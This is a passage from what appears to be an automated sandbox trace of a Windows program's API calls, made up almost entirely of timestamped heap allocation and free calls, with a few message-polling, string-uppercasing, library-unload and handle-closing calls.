dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.324] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.324] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.324] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.324] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.325] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.325] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.326] FreeLibrary (hLibModule=0x74d40000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.326] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.327] CloseHandle (hObject=0x2cc) returned 1 [0258.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0258.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0258.330] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0258.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0258.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.332] CloseHandle (hObject=0x2d0) returned 1 [0258.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0258.334] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0258.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0258.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0258.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0258.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0258.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0258.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.340] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0258.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.340] 